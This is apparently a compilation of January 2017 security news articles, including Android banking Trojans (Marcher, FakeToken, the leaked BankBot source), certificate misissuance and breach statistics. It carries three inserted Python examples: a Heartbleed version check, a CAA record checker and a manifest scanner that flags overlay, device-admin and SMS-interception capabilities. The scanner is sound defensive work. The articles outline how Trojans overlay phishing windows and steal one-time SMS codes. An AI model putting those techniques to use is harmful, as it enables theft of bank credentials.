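An added example, not from the article or from Shodan: a Python triage helper that applies the affected-version rule from the OpenSSL advisory (1.0.1 through 1.0.1f, plus 1.0.2-beta1) to `openssl version` banners and maps each service's key and certificate dates onto the three remediation steps above. The inventory rows and the `patched_on` dates are constructed assumptions; because distributions backport fixes without changing the version string, a "vulnerable" banner is a hint to confirm, not proof.

```python
import re
from datetime import date

# Upstream OpenSSL releases that shipped the vulnerable heartbeat code:
# 1.0.1 through 1.0.1f and the 1.0.2-beta1 pre-release. 1.0.1g and
# 1.0.2-beta2 carried the fix; 0.9.8 and 1.0.0 never had the extension.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)([a-z]*)(?:-beta(\d+))?", re.IGNORECASE)


def parse_openssl_version(text):
    """Parse '1.0.1e', '1.0.2-beta1' or the first line of `openssl version`
    output such as 'OpenSSL 1.0.1e-fips 11 Feb 2013'.
    Returns (major, minor, fix, letter, beta) or None if nothing parses."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    major, minor, fix, letter, beta = m.groups()
    return int(major), int(minor), int(fix), letter.lower(), (int(beta) if beta else None)


def heartbleed_vulnerable(text):
    """True if the version string falls in the affected range, False if it is
    a fixed or unaffected release, None if the string cannot be parsed.
    Caveat: distributions backport fixes without bumping the version (Debian
    and Red Hat both shipped patched 1.0.1e packages), so True from the banner
    alone must be confirmed against the vendor changelog or a live test."""
    parsed = parse_openssl_version(text)
    if parsed is None:
        return None
    major, minor, fix, letter, beta = parsed
    if (major, minor) != (1, 0):
        return False                 # 0.9.x and 1.1.x are outside the range
    if fix == 1:
        return letter <= "f"         # '' (1.0.1 itself) .. 'f' vulnerable, 'g'+ fixed
    if fix == 2:
        return beta == 1             # only 1.0.2-beta1 was affected
    return False                     # 1.0.0x predates the heartbeat extension


def _to_date(iso):
    return date.fromisoformat(iso) if iso else None


def remaining_remediation_steps(version, key_generated, cert_issued, patched_on):
    """Map one service onto the three steps the article lists. Dates are ISO
    strings or None. A private key or certificate created before the library
    was patched may already have been read out of memory, so updating OpenSSL
    alone is not enough; patched_on=None means the host is still unpatched."""
    key_dt, cert_dt, patch_dt = _to_date(key_generated), _to_date(cert_issued), _to_date(patched_on)
    steps = []
    if heartbleed_vulnerable(version) is not False:
        steps.append("patch OpenSSL")
    if patch_dt is None or key_dt is None or key_dt < patch_dt:
        steps.append("generate new private key")
    if patch_dt is None or cert_dt is None or cert_dt < patch_dt:
        steps.append("reissue certificate")
    return steps


if __name__ == "__main__":
    # Constructed inventory rows: host, version banner, key date, cert date, patch date.
    inventory = [
        ("web-1", "OpenSSL 1.0.1e-fips 11 Feb 2013", "2013-05-01", "2013-05-02", None),
        ("web-2", "OpenSSL 1.0.1g 7 Apr 2014", "2013-05-01", "2013-05-02", "2014-04-09"),
        ("web-3", "OpenSSL 1.0.1g 7 Apr 2014", "2014-04-10", "2014-04-10", "2014-04-09"),
    ]
    for host, banner, key_dt, cert_dt, patched in inventory:
        print(host, remaining_remediation_steps(banner, key_dt, cert_dt, patched))
```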

Expert Hacks Internal DoD Network via Army Website

23.1.2017 Securityweek Hacking

A security researcher who took part in the Hack the Army bug bounty program managed to gain access to an internal Department of Defense (DoD) network from a public-facing Army recruitment website.

Hack the Army ran via the HackerOne platform between November 30 and December 21, and the results of the program have now been made public. A total of 371 people registered, including 25 government employees, and they submitted 416 vulnerability reports – the first one came within five minutes of launch.

Roughly 118 of the reports have been classified as unique and actionable, and participants have been awarded a total of approximately $100,000. The final amount may be larger as bounties are still being paid out.

The most noteworthy submission came from a researcher who managed to chain multiple vulnerabilities in order to get from the goarmy.com Army careers website to an internal DoD network that can normally be accessed only by authorized users.

“They got there through an open proxy, meaning the routing wasn’t shut down the way it should have been, and the researcher, without even knowing it, was able to get to this internal network, because there was a vulnerability with the proxy, and with the actual system,” the Army said in a blog post on HackerOne.

The Army believes an automated testing system could not have known how to chain less serious flaws into a potentially dangerous exploit.

Hack the Army was announced in mid-November after the DoD awarded a combined $7 million contract to HackerOne and Synack for helping the organization’s components launch bug bounty programs similar to Hack the Pentagon.

Hack the Pentagon received 138 valid submissions and it cost the U.S. government $150,000, half of which went to participants. Thanks to the success of these programs, similar events will likely be launched in the future.

In the meantime, researchers who find flaws in the DoD’s *.defense.gov and *.mil websites are still encouraged to report them. The Pentagon recently published its vulnerability disclosure policy in an effort to provide guidance to white hat hackers on how to legally report their findings.

Symantec Revokes Wrongly Issued Certificates

23.1.2017 Securityweek Safety

Symantec has revoked numerous wrongly issued certificates, including for domains such as example.com and test.com. This is not the first time the security firm’s certificate issuance practices have come under scrutiny.

The misissued certificates were spotted via the Certificate Transparency (CT) system by Andrew Ayer, founder of SSLMate. The expert discovered several certificates for example.com, which he confirmed were not authorized by the domain’s owner. He also identified certificates for domains such as test.com, test1.com, test2.com, and others containing the string “test.”

Ayer found more than 100 wrongly issued certificates attributed to Symantec and its subsidiaries GeoTrust and Thawte. The problematic certificates have several entries with the value “test,” which suggests they have been issued for testing purposes.

Andrew Ayer (@__agwa), 19 Jan 2017: "This is a HUGE no-no. There are very specific rules certificate authorities must follow to verify that a certificate request is authorized."

Andrew Ayer (@__agwa), 10:50 PM - 19 Jan 2017: "Even if the certs were only for testing, if a system allows employees to bypass authorization, it will allow attackers to bypass it too."

Steven Medin, PKI policy manager at Symantec, said the certificates had been issued by one of the company’s WebTrust audited partners. Medin said this partner’s privileges have been reduced to restrict further issuance and the reported certificates have all been revoked.

Ayer has advised domain owners to monitor CT logs to determine if unauthorized certificates have been issued for their websites. Since this is not the first time Symantec has misissued certificates, the expert has also recommended excluding the company via CAA records, which allow users to specify which CA can issue certificates for their domain.
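An added example, not code from the article, SSLMate or Symantec: a Python implementation of the CAA check a CA is expected to perform under RFC 6844 (climb to the closest ancestor with CAA records, honour issue/issuewild, the empty-issuer ";" form and critical unknown tags), run over a constructed zone. CAA is an allow-list, so "excluding" a CA means publishing issue records that name only the CAs you actually use; the domains, record values and CA names here are assumptions.

```python
# Constructed zone data: domain -> list of (flags, tag, value) CAA records.
# example.com below reflects the article's advice to restrict issuance to the
# CA(s) a domain owner actually uses; every value is made up for illustration.
CONSTRUCTED_CAA = {
    "example.com": [
        (0, "issue", "letsencrypt.org"),
        (0, "issuewild", ";"),                       # ';' forbids wildcard issuance entirely
        (0, "iodef", "mailto:security@example.com"),  # where CAs report violations
    ],
    "test.com": [],                                   # no CAA anywhere: any CA may issue
    "locked.example.net": [
        (128, "future-tag", "unknown"),               # critical flag on an unknown tag
    ],
}

KNOWN_TAGS = {"issue", "issuewild", "iodef"}


def relevant_caa_set(domain, zone):
    """RFC 6844 relevant record set (CNAME/DNAME handling omitted): the CAA
    records of the closest name, walking up the tree, that has any."""
    labels = domain.lower().split(".")
    while labels:
        name = ".".join(labels)
        records = zone.get(name, [])
        if records:
            return name, records
        labels = labels[1:]
    return None, []


def _issuer_domain(value):
    # value is 'issuer-domain; key=val; ...' or ';' (no issuer at all)
    return value.split(";", 1)[0].strip().lower()


def ca_may_issue(ca_domain, requested_name, zone):
    """Decide whether the CA identified by ca_domain may issue for
    requested_name ('*.example.com' is a wildcard request)."""
    wildcard = requested_name.startswith("*.")
    base = requested_name[2:] if wildcard else requested_name
    _, records = relevant_caa_set(base, zone)
    if not records:
        return True                                   # no CAA up the whole tree
    if any(flags & 128 and tag.lower() not in KNOWN_TAGS for flags, tag, _ in records):
        return False                                  # critical tag we don't understand
    tag = "issue"
    if wildcard and any(t.lower() == "issuewild" for _, t, _ in records):
        tag = "issuewild"                             # issuewild overrides issue for wildcards
    relevant = [v for _, t, v in records if t.lower() == tag]
    if not relevant:
        return True                                   # CAA present but nothing constrains this request
    return ca_domain.lower() in {_issuer_domain(v) for v in relevant}


def caa_zone_lines(domain, records):
    """Render records in zone-file presentation format for publishing."""
    return [f'{domain}. IN CAA {flags} {tag} "{value}"' for flags, tag, value in records]


if __name__ == "__main__":
    for name in ("www.example.com", "*.example.com", "test.com", "locked.example.net"):
        for ca in ("letsencrypt.org", "symantec.com"):
            print(f"{ca:16} -> {name:20} {ca_may_issue(ca, name, CONSTRUCTED_CAA)}")
    print("\n".join(caa_zone_lines("example.com", CONSTRUCTED_CAA["example.com"])))
```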

In October 2015, Google asked Symantec to improve its certificate issuance practices after Thawte was caught releasing certificates for google.com domains. The company claimed to have issued the certificates for testing purposes, but it ultimately decided to terminate some employees after completing its investigation.

Symantec’s certificate business also made the news in February 2016, when the company asked browser vendors to allow it to issue nine new SSL certificates signed with SHA-1 for Worldpay after the payment processor failed to upgrade some devices before the December 31, 2015, deadline.

Mozilla Internet Health Report calls for more security and privacy

23.1.2017 securityaffairs Security

The Mozilla foundation has published its first Internet Health Report to analyze the dangers of the Internet that we can consider as a global commodity.

The oligarchy of internet companies, internet monitoring, censorship and new threats posed by Internet of Things devices menace our privacy every day.

Mozilla aims to track the health of the Internet focusing on aspects such as the Open Innovation, Digital Inclusion, Decentralization, Privacy and Security and Web literacy.

“We want to work with people and organizations that care about a healthy internet to engage the general public in caring more deeply about ‘internet health,’ in the way that the environmental movement was able to grow mainstream using terms like ‘global warming’ that no one previously had heard of,” explained the editor Solana Larsen.

There is positive news from the security and privacy perspective: communications over the Internet are more secure thanks to the efforts of organizations and private companies.

The Internet Health Report appreciates the adoption of end-to-end encryption by messaging apps and other web services and welcomes the upcoming new version of the Transport Layer Security (TLS 1.3) cryptographic protocol that will make the web more secure and fast.

“More messaging apps, including WhatsApp, now offer end-to-end encryption, meaning that conversations are protected from eavesdroppers, including the service provider.” states the report.

“Web traffic encryption is rising too. One factor is the launch of Let’s Encrypt, a new certificate authority that makes it easy and free to add HTTPS to any website. This helps protect the privacy of users, and offers some guarantee they are not looking at spoof pages. Also driving adoption, search engines and browsers are now subtly rewarding HTTPS websites.

Unknown to most, Internet communication will be more private, and possibly also faster, due to an upcoming new version of the cryptographic protocol called Transport Layer Security (TLS 1.3) that is used to secure all communications between Web browsers and servers.”

Unfortunately, snooping powers continue to grow, and several states continue to spend significant effort on surveillance activities that threaten users’ privacy.

“There is more public scrutiny of surveillance laws than before, but it hasn’t stopped greater snooping powers from being proposed in Britain, Pakistan, France and several other countries,” states the report.

The report also warns of the risks related to the rapid and uncontrolled spread of unsecured IoT devices. Lax security is the root cause of the success of botnets like Mirai and opens the door to surveillance and hacking activities.

“In November 2016, a malware program called Mirai mobilized 100,000 connected devices, including webcams and baby monitors, in a distributed denial-of-service attack (DDOS) that briefly took down parts of the internet,” states the report.

“The owners of those compromised devices may never know (or care) what happened, and cheap and insecure devices will continue to be manufactured, unless safety standards, rules and accountability measures take hold,” they said.

The Mozilla Foundation is calling on everyone to take action to improve and ensure security and privacy.

“Above all, we should be more critical about what information we share voluntarily. Will the online dating profile you posted 6 years ago ever get deleted? How long do the online ads you view track you? Even if you’d like to know the privacy conditions of online platforms, they are usually not written in English,” closes the report.

Do web injections exist for Android?
23.1.2017 Kaspersky Android
Web injection attacks

There’s an entire class of attacks that targets browsers – so-called Man-in-the-Browser (MITB) attacks. These attacks can be implemented using various means, including malicious DLLs, rogue extensions, or more complicated malicious code injected into pages in the browser by spoofing proxy servers or other ways. The purpose of an MITB attack may vary from relatively innocuous ad spoofing on social networks or popular websites to stealing money from user accounts – the latter is what happened in the Lurk case.

A malicious app masquerades as a Kaspersky Lab product in an MITB attack

Web injection is used in most cases when an MITB-class attack targets online banking. This type of web injection attack involves malicious code being injected into an online banking service webpage to intercept the one-time SMS message, harvest information about the user, spoof banking details, etc. For example, our Brazilian colleagues have long reported about barcode spoofing attacks performed when users print out Boletos – popular banking documents issued by banks and all kind of businesses in Brazil.

Meanwhile, the prevalence of MITB attacks in Russia is decreasing – cybercriminals are opting for other methods and attack vectors to target banking clients. For the average cybercriminal, it is much easier to use readily available tools than develop and implement web injection tools.

Despite this, we’re often asked if there are any web injection attacks for Android devices. This is our attempt to investigate and give as full an answer as possible.

Web injection on Android

Despite the term ‘inject’ being used in connection with mobile banking Trojans (and sometimes used by cybercriminals to refer to their data-stealing technologies), Android malware is a whole different world. In order to achieve the same goals pursued by web injection tools on computers, the creators of mobile Trojans use two completely different technologies: overlaying other apps with a phishing window, and redirecting the user from a banking web page to a specially crafted phishing page.

Overlaying apps with phishing windows

This is the most popular technology with cybercriminals and is used in practically all banking Trojans. 2013 was when we first encountered a piece of malware overlaying other apps with its phishing window – that was Trojan-Banker.AndroidOS.Svpeng.

Today’s mobile banking Trojans most often overlay the Google Play Store app with their phishing window – this is done in order to steal the user’s bank card details.

The Marcher malware

Besides this, Trojans often overlay various social media and instant messaging apps and steal the passwords to them.

However, mobile banking Trojans typically target financial applications, mostly banking apps.

Three methods of MITB attacks for mobile OS can be singled out:

1. A special Trojan window, crafted beforehand by cybercriminals, is used to overlay another app’s window. This method was used, for example, by the Acecard family of mobile banking Trojans.

Acecard phishing windows

2. Apps are overlaid with a phishing web page located on a malicious server. This way, the cybercriminals can modify its contents any time they need to. This method is used by the Marcher family of banking Trojans.

Marcher phishing page

3. A template page is downloaded from a malicious server, to which the icon and the name of the attacked application is added. This is how one of the Trojan-Banker.AndroidOS.Faketoken modifications manages to attack over 2,000 financial apps.

FakeToken phishing page

It should be noted that starting from Android 6, for the above attack method to work, the FakeToken Trojan has to request the privilege of displaying its window on top of other app windows. It’s not alone though: as new versions of Android are gaining popularity, a growing number of mobile banking Trojans are beginning to request such privileges.
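An added example, not Kaspersky's code: a Python triage script over a constructed, decoded AndroidManifest.xml (the text form apktool emits; inside an APK the manifest is binary XML) that flags the capability combination described here and in the BankBot report further down the page: the overlay privilege (SYSTEM_ALERT_WINDOW, which Android 6 makes the user grant explicitly), device-admin rights and an SMS_RECEIVED receiver. The package, label and class names are assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = f"{{{ANDROID_NS}}}name"
A_PERM = f"{{{ANDROID_NS}}}permission"
A_PRIO = f"{{{ANDROID_NS}}}priority"

OVERLAY_PERM = "android.permission.SYSTEM_ALERT_WINDOW"
RECEIVE_SMS_PERM = "android.permission.RECEIVE_SMS"
DEVICE_ADMIN_PERM = "android.permission.BIND_DEVICE_ADMIN"
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"

# Constructed manifest in decoded text form (package, label and class names
# are made up); it combines the three capabilities the article describes.
CONSTRUCTED_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.constructed.player">
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Video Player">
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".SmsReceiver">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""


def triage_manifest(xml_text):
    """Return {finding: detail} for the capabilities a banking Trojan needs.
    Each one is legitimately used by some app class (launchers, MDM agents,
    SMS clients), so a hit is a review trigger, not a verdict."""
    root = ET.fromstring(xml_text)
    perms = {e.get(A_NAME) for e in root.iter("uses-permission")}
    findings = {}
    if OVERLAY_PERM in perms:
        findings["overlay"] = ("requests SYSTEM_ALERT_WINDOW: can draw windows over "
                               "other apps (granted by the user from Android 6 on)")
    for rcv in root.iter("receiver"):
        name = rcv.get(A_NAME)
        if rcv.get(A_PERM) == DEVICE_ADMIN_PERM:
            findings["device_admin"] = f"{name} is a device-admin receiver (resists uninstall)"
        for flt in rcv.iter("intent-filter"):
            actions = {a.get(A_NAME) for a in flt.iter("action")}
            if SMS_RECEIVED_ACTION in actions and RECEIVE_SMS_PERM in perms:
                prio = flt.get(A_PRIO, "0")          # high priority = sees SMS before the default app
                findings["sms_intercept"] = (f"{name} handles SMS_RECEIVED at priority {prio}: "
                                             "can read one-time codes and bank alerts")
    return findings


def risk_label(findings):
    """Overlay + SMS interception + device admin together is the full banker pattern."""
    hits = len({"overlay", "device_admin", "sms_intercept"} & set(findings))
    return {3: "high", 2: "medium", 1: "low"}.get(hits, "none")


if __name__ == "__main__":
    found = triage_manifest(CONSTRUCTED_MANIFEST)
    for key, detail in found.items():
        print(f"[{key}] {detail}")
    print("risk:", risk_label(found))
```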

Redirecting the user from the bank’s page to a phishing page

We were only able to identify the use of this technology in the Trojan-Banker.AndroidOS.Marcher family. The earliest versions of the Trojan that redirected the user to a phishing page are dated late April 2016, and the latest are from the first half of November 2016.

Redirecting the user from a bank’s webpage to a phishing page works as follows. The Trojan subscribes to changes in the browser's bookmarks, which include changes to the currently open page. This way the Trojan knows which webpage is currently open, and if it happens to be one of the targeted pages, the Trojan opens the corresponding phishing page in the same browser and redirects the user there. We were able to find over a hundred web pages belonging to financial organizations that were targeted by the Marcher family of Trojans.

However, two points need to be raised:

All new modifications of the Marcher Trojan that we were able to detect no longer use this technology.
Those modifications that used this technology also used a method of overlaying other apps with their phishing window.
Why then was the method of redirecting the user to a phishing page used by only one family of mobile banking Trojans, and why is this technology no longer used in newer modifications of the family? There are several reasons:

In Android 6 and later versions, this technology no longer works, meaning the number of potential victims is decreasing every day. For example, around 30% of those using Kaspersky Lab’s mobile security solutions now use Android 6 or a later version;
The technology only worked on a limited number of mobile browsers;
The user can easily spot that they are being redirected to a phishing site and they may also notice that the URL of the webpage has changed.
Attacks launched using root privileges

With superuser privileges, Trojans can perform any attack, including real malicious injections into browsers. Although we were unable to find a single case of this happening, the following should be noted:

Some modules of Backdoor.AndroidOS.Triada can substitute websites in certain browsers, using superuser privileges. All the attacks we found were launched with the purpose of making some money from advertising only, and did not result in the theft of banking information.
The banking Trojan Trojan-Banker.AndroidOS.Tordow, using superuser privileges, can steal passwords saved in browsers, which may include passwords to financial websites.

We can state that, despite all the available technical capabilities, cybercriminals that target banks do not make use of malicious web injections in mobile browsers or injections in mobile apps. Sometimes they use these technologies to spoof adverts, but even then that requires highly sophisticated malicious software.

So why do cybercriminals ignore the available opportunities? Most probably it is because of the diversity of mobile browsers and apps. Malware writers would have to adapt their creations to a long list of programs, which is rather costly, while simpler and more versatile attacks involving phishing windows do not require so much effort to target a larger number of users.

Nonetheless, the Triada and Tordow examples suggest that similar attacks may well take place in the future as malware creators gain more expertise.

Source Code for another Android Banking Malware Leaked
23.1.2017 thehackernews Android
Another bad news for Android users — Source code for another Android banking malware has been leaked online via an underground hacking forum.
This newly discovered banking Trojan is designed to steal money from bank accounts of Android devices' owners by gaining administrator privileges on their smartphones.
Apparently, it will attract the attention of many cyber criminals who can recompile the source code or can also use it to develop more customized and advanced variants of Android banking Trojans.
According to security researchers from Russian antivirus maker Dr. Web, the malware's source code was posted online, along with the information on how to use it, meaning Android devices are most likely to receive an increasing number of cyber attacks in upcoming days.
Leaked: Trojan Source Code + 'How to Use' Instructions
Dr. Web researchers said they have already discovered one banking trojan in the wild developed using this leaked source code, adding that the Trojan is distributed as popular apps either directly injected in APKs available online or in third-party app stores.
Dubbed BankBot, the Trojan has the ability to obtain administrator privileges on infected devices. Once it gets full privileges, the Trojan removes the app's icon from the phone's home screen in order to trick victims into believing it was removed.
However, the BankBot Trojan remains active in the background, waiting for commands from the attacker's command and control (C&C) server. So far it has been found targeting only users of Russian banks.
BankBot has the ability to perform a broad range of tasks, including send and intercept SMS messages, make calls, track devices, steal contacts, show phishing dialogs, and steal sensitive information, like banking and credit card details.
"Like many other Android bankers, [BankBot] steals confidential user information by tracking the launch of online banking apps and payment system software. One sample examined by Doctor Web's security researchers controls over three dozen such programs," the researchers explain.
"Once Android.BankBot.149.origin detects that any of the aforementioned applications have been launched, it loads the relevant phishing input form to access user bank account login and password information and displays it on top of the attacked application."
Why Should You Worry about BankBot?
The malware hides itself until the victim opens a mobile banking or social media app. Once the victim opens one such app, BankBot launches a phishing login overlay, tricking the victim into re-authenticating or re-entering their payment card details.
The collected data is then sent back to online servers, where the attackers can access the stolen data.
BankBot can phish credentials for apps including Facebook, WhatsApp, Instagram, Twitter, Youtube, Snapchat, Viber, WeChat, imo, Uber, and the Google Play Store.
Besides this, the BankBot trojan can also intercept text messages, send them to the attackers, and then delete them from the victim's smartphone, which means bank notifications never reach the users.
How to Protect Yourself against such Attacks?
Now, this is just one piece of malware developed using the publicly available source code and discovered by researchers. It is likely that more such malware is out there targeting Android devices but has not yet been caught.
To protect yourself against such attacks, as I previously recommended, you are advised to:
Always be super-careful when downloading APKs from third-party app stores. Go to Settings → Security and then Turn OFF "Allow installation of apps from sources other than the Play Store."
Never open attachments from unknown or suspicious sources.
Never click on links in SMS or MMS sent to your mobile phone. Even if the message looks legit, go directly to the website of origin and verify any possible updates.
Always keep your Anti-virus app up-to-date.
Keep your Wi-Fi turned OFF when not in use and avoid unknown and unsecured Wi-Fi hotspots.

Number of U.S. Data Breaches Increased in 2016: Report

23.1.2017 Securityweek Crime
The number of data breaches disclosed by organizations in the United States has increased by 40 percent in 2016 compared to the previous year, according to a report released on Thursday by CyberScout (formerly IDT911) and the Identity Theft Resource Center (ITRC).

ITRC has counted 1,093 breaches and more than 36 million exposed records across sectors such as financial, business, education, government and military, and healthcare. While this is an all-time record high and a significant increase from the 780 breaches reported in 2015, experts believe this upward trend is also due to more states disclosing incidents on their websites.

It’s also worth noting that while 36 million records might not seem much, ITRC has pointed out that half of the breach notifications did not disclose the number of exposed records.

Nearly half of the data breaches disclosed last year affected the business sector (494), followed by healthcare (377), education (98), government (72) and financial (52). Hacking, phishing and skimming attacks, including business email compromise (BEC) schemes, accounted for more than 55 percent of incidents.

Data breach trends

ITRC has determined that at least 52 percent of the breaches reported in 2016 involved social security numbers and 13 percent involved payment cards. While the number of incidents exposing credit and debit cards has decreased compared to 2015, exposure of SSNs increased by 8.2 percent.

“More than half of the breaches reported by the ITRC included the skeleton key to our lives: the Social Security number. This trend, which has accelerated since 2015— when just four breaches exposed over 120 million Social Security numbers to state-sponsored hackers and cyber criminals— represents the point of no return for millions of Americans,” said Adam Levin, Chairman and Founder of CyberScout. “While credit and debit card numbers can be changed, SSNs cannot. Therefore, monitoring and damage control become even more important than ever before.”

The complete list of breached organizations and information on each incident are available in ITRC’s 2016 Data Breach Report.

OurMine crew hacked the New York Times Twitter video account
23.1.2017 securityaffairs
The New York Times is investigating the hack of its Twitter video account (@nytvideo), which was used to post fake news on Sunday morning.
@nytvideo is the New York Times video account and has more than 250,000 followers on the platform.
Yesterday, at around 9:40 a.m. ET, the account shared fake news about a missile attack by Russia against the United States. The message about the “missile attack” quoted a “leaked statement” from Russian President Vladimir Putin.


The fake tweet was quickly deleted, while other tweets posted to the account claimed the involvement of the OurMine hacker group. The group, which hacked the Netflix US Twitter account (@Netflix) in December to promote its website and hacking services, is known for its attacks against high-profile Twitter accounts. The list of victims is very long and includes Mark Zuckerberg, Twitter co-founder Evan Williams, David Guetta, Spotify CEO and founder Daniel Ek, former Twitter CEO Dick Costolo, Twitter CEO Jack Dorsey, Google CEO Sundar Pichai, and many others.

One of the messages shared by OurMine confirmed that the group is also responsible for the hijacking of Sony Music’s Twitter account last month, when the hackers tweeted a hoax about Britney Spears’ death.

Below are the messages shared by the group:

“Message from OurMine: We detected unusual activity on the account and we re-hacked it to make sure if the account is hacked or not,” read one tweet posted to the @nytvideo account Sunday.


All the messages were deleted by staff at The New York Times; the account also posted a message confirming that a series of tweets published “without our authorization” had been removed.

New York Times Video (@nytvideo), 4:17 PM - 22 Jan 2017:
“We deleted a series of tweets published from this account earlier today without our authorization. We are investigating the situation.”

Western Union agreed to pay $586 Million to settle fraud charges
23.1.2017 securityaffairs Incident

Money transfer leader Western Union has agreed to forfeit $586 million to settle fraud charges and has admitted it facilitated scammers.
Western Union has admitted to facilitating wire fraud and has agreed to pay $586 million to settle charges brought by the U.S. Federal Trade Commission (FTC) and the Department of Justice.

Western Union’s services have often been exploited by crooks and fraudsters because the company failed to maintain an effective anti-fraud program.

The U.S. Federal Trade Commission (FTC) and the Department of Justice accused the company of failing to act promptly against criminals who used its service to move the proceeds of illicit activities.

Since 2001, the US authorities have convicted 29 owners and employees of Western Union agents for their active participation in fraud schemes.

“As this case shows, wiring money can be the fastest way to send it – directly into the pockets of criminals and scam artists,” said Acting Assistant Attorney General David Bitkower. “Western Union is now paying the price for placing profits ahead of its own customers. Together with our colleagues, the Criminal Division will both hold to account those who facilitate fraud and abuse of vulnerable populations, and also work to recoup losses and compensate victims.”

“Our investigation uncovered hundreds of millions of dollars being sent to China in structured transactions designed to avoid the reporting requirements of the Bank Secrecy Act, and much of the money was sent to China by illegal immigrants to pay their human smugglers,” said U.S. Attorney Eileen M. Decker. “In a case being prosecuted by my office, a Western Union agent has pleaded guilty to federal charges of structuring transactions – illegal conduct the company knew about for at least five years. Western Union documents indicate that its employees fought to keep this agent – as well as several other high-volume independent agents in New York City – working for the Western Union because of the high volume of their activity. This action today will ensure that Western Union effectively controls its agents and prevents the use of its money transfer system for illegal purposes.”

Western Union has been charged with violating several laws, including the Bank Secrecy Act (BSA) and the FTC Act.

The FTC said Western Union had received, between January 1, 2004 and August 29, 2015, 550,928 complaints regarding fraudulent transfers.

The fraud-induced transfers were tied to online dating, lottery and family emergency scams, among other schemes. The reported transfers totaled more than $632 million, but prosecutors believe this is just the tip of the iceberg: many victims never file a complaint, and fraud-reporting mechanisms are not available everywhere.

“Western Union maintains a database of complaints it receives about fraud-induced money transfers. Based on information in that database, between January 1, 2004 and August 29, 2015, Western Union received at least 550,928 complaints about fraud-induced money transfers, totaling at least $632,721,044. Over 80% of the complaints in the database were from U.S. consumers” reads the complaint.


Western Union has agreed to forfeit $586 million; the money will be used to compensate fraud victims.

“The Western Union Company (Western Union), a global money services business headquartered in Englewood, Colorado, has agreed to forfeit $586 million and enter into agreements with the Federal Trade Commission, the Justice Department, and the U.S. Attorneys’ Offices of the Middle District of Pennsylvania, the Central District of California, the Eastern District of Pennsylvania and the Southern District of Florida. In its agreement with the Justice Department, Western Union admits to criminal violations including willfully failing to maintain an effective anti-money laundering program and aiding and abetting wire fraud.” states the settlement.

The FTC order requires Western Union to implement and maintain a comprehensive anti-fraud program, prohibits the company from transmitting a money transfer that it knows or reasonably should know is fraud-induced, and requires it to:

block money transfers sent to any person who is the subject of a fraud report;
provide clear and conspicuous consumer fraud warnings on its paper and electronic money transfer forms;
increase the availability of websites and telephone numbers that enable consumers to file fraud complaints; and
refund a fraudulently induced money transfer if the company failed to comply with its anti-fraud procedures in connection with that transaction.

Western Union isn’t the only money transfer company targeted by the FTC: MoneyGram agreed to pay $18 million in 2009 to settle similar charges.

Russian Hacker behind 'NeverQuest' Malware, Wanted by FBI, Is Arrested in Spain
22.1.2017 thehackernews Hacking
A Russian computer hacker wanted by the FBI on hacking allegations was arrested and jailed in Spain earlier this week, while a decision on his extradition to the United States has yet to be made.
Officers of the Guardia Civil, the Spanish law enforcement agency, detained 32-year-old Stanislav Lisov at Barcelona–El Prat Airport on an international arrest warrant issued by Interpol at the request of the FBI.
Lisov was arrested on suspicion of creating and operating the NeverQuest banking Trojan, malware that targeted financial institutions around the world and caused an estimated $5 million in damage.
The arrest came shortly after U.S. intelligence agencies concluded that Russian hackers were behind the hacks surrounding the November 2016 presidential election, which possibly influenced the outcome in Donald Trump's favor.
However, Spanish police said in an official statement that the FBI had requested Lisov's arrest following an investigation that began in 2014.
The NeverQuest banking Trojan gave fraudsters access to the computers of individuals and financial institutions in order to steal banking data.
The Trojan, which spreads itself via social media, email and file transfer protocols, can modify content on banking websites and inject rogue forms into these sites, allowing attackers to steal login credentials from users.

NeverQuest can also allow malicious attackers to take control of a compromised computer through a Virtual Network Computing (VNC) server and then use those computers to log into the victim’s online bank and perform the theft.
"A thorough investigation of the servers operated by Lisov in France and Germany revealed databases with stolen lists of information from accounts of financial institutions, with data indicating, among other things, account balances," the Spanish Civil Guard said Friday.
"One of the servers leased by Lisov contained files with millions of login credentials, including usernames, passwords, and security questions and answers, for the bank and financial website accounts."
Lisov reportedly works as a systems administrator and website developer for a local company in Taganrog, Russia.
The Russian hacker is being held by authorities in the north-eastern region of Catalonia until Spain's High Court decides whether to extradite him to the United States.

Cyber crimes spike in England and Wales, says ONS
22.1.2017 securityaffairs Hacking
For the first time, the crime figures of the UK Office for National Statistics (ONS) include data on hacking and fraud, and the findings are striking.
Cyber criminal activity in England and Wales has spiked in the last twelve months; fraud and computer misuse offences are the most common crimes in this worrying trend.

According to the report “Crime in England and Wales: year ending Sept 2016” published by the UK Office for National Statistics (ONS), there were an estimated 6.2 million incidents of crime in England and Wales in the 12 months to September 2016.

The ONS crime survey is an annual analysis of crime that has been produced for the past 35 years. Data for Scotland and Northern Ireland are not included because those countries have separate judicial and policing regimes.

“Headline figures from the Crime Survey for England and Wales (CSEW) produced on a consistent basis showed an estimated 6.2 million incidents of crime in the survey year ending September 2016; no statistically significant change compared with the previous year’s survey.” states the report.

“Following an extension of the coverage of the survey, Experimental Statistics showed there were 3.6 million fraud and 2.0 million computer misuse offences for the first full year in which such questions have been included in the CSEW.”

The headline figure is unchanged compared with the previous 12 months; the difference is the weight of cyber criminal activity once it is counted.

Adding the 3.6 million fraud cases and 2.0 million computer misuse offences to the 6.2 million headline figure brings the number of estimated incidents to 11.8 million, roughly a 90 per cent increase over the headline figure.

The most important takeaway from the report is the inclusion of computer crime and fraud in the survey, which reflects growing awareness of cyber threats.

Supercell, Clash of Clans authors, hacked. 1 Million accounts compromised
22.1.2017 securityaffairs Hacking
Reportedly, over a million accounts on the Supercell community forum were compromised in a data breach that occurred in 2016.
